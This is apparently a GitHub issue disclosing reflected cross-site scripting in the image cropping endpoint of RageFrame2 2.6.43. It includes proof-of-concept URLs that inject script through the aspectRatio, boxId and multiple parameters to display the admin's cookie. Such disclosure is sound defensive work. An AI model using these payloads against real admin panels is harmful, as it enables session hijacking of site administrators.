You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.
Details
In the image cropping function of RageFrame2 2.6.43, aspectRatio, boxId and multiple variables are not filtered, resulting in multiple reflective XSS vulnerabilities.
Summary
RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.
Details
In the image cropping function of RageFrame2 2.6.43,
aspectRatio,boxIdandmultiplevariables are not filtered, resulting in multiple reflective XSS vulnerabilities.POC
aspectRatioXSS payloadhttp://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0
boxIdXSS payloadhttp://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0
multipleXSS payloadhttp://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
The text was updated successfully, but these errors were encountered: